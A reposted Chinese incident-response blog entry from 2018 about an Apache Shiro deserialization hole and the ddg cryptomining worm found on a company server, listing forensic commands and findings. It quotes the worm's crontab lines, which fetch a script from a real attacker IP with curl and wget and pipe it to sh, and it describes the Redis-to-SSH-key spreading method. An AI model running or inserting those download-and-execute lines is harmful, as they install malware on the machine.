應急響應--記錄一次漏洞緊急處理中意外發現的挖礦木馬(Shiro反序列化漏洞和ddg挖礦木馬)
阿新 • • 發佈:2018-07-02
var vpc hist crontab 使用 8.4 wget 序列化 coo
背景
某公司線上服務器意外發現一個Apache Shiro 反序列化漏洞,可以直接GetShell。出於做安全的謹慎,馬上出現場應急,確認漏洞。該漏洞存在在cookie字段中的rememberMe字段中,可以RCE
漏洞應急
來到現場後,發現已經升級了,漏洞確認修復完成,只能查看以前的攻擊痕跡。
查看賬號情況
首先查看賬戶文件/etc/passwd,修改時間和內容沒有什麽問題
stat /etc/passwd
cat /etc/passwd
查看文件情況
查看最近修改過的文件沒看到特殊異常
ls -alst / -m -10 -name *
查看進程
查看進程
ps aux
看到異常 perl nc2.pl 後面參數跟著一個燈塔國地址,馬上想到是反彈的shell,查問漏洞檢測者,果真是,確認無害後kill進程。
查看網絡連接
netstat -anop | grep tcp
發現服務器對外連接很多22端口,覺得異常,服務器主動對外發起連接22端口,很少見,詢問業務也沒有這類業務。看相關進程號,查看進程名ddg.2020。明顯是一個礦馬,經排查服務器上還啟動redis和memcached。都是未授權訪問。目測,是對外發起6379未授權漏洞的利用,寫了root下的id_rsa.pub然後嘗試22登錄,看下自己的root下的.sshd,果真有id_rsa.pub不正常,因為都不適用root登錄遂刪除。查看進程目錄。/tmp下面的,沒有這個文件樣板,全盤搜,只有ddg.2020.db沒有ddg.2020,隨機google,發現該樣本會刪除自己的文件,並啟動定時任務去下載自己。
sudo -i
crontab -e
沒有發現問題,還有一個地方
cat /var/spool/cron/crontabs/root
果然看到
curl -fsSL https://218.248.40.228:8443/i.sh | sh
wget -g -O -http://218.248.40.228:8443/i.sh | sh
馬上配置阻斷
查看進程運行時間對應的操作
history #只有四百多條,很明顯不對
who /var/log/wtmp
last
last /var/run/utmp #
發現那天的登錄日誌被清理。
查看VPC內其他主機,都不存在該蠕蟲,那麽肯定就是通過getshell打進來,然後種了樣本之後離開的。
總結
異常的發現在於明顯區別於正常使用用途的網絡連接。
應急響應--記錄一次漏洞緊急處理中意外發現的挖礦木馬(Shiro反序列化漏洞和ddg挖礦木馬)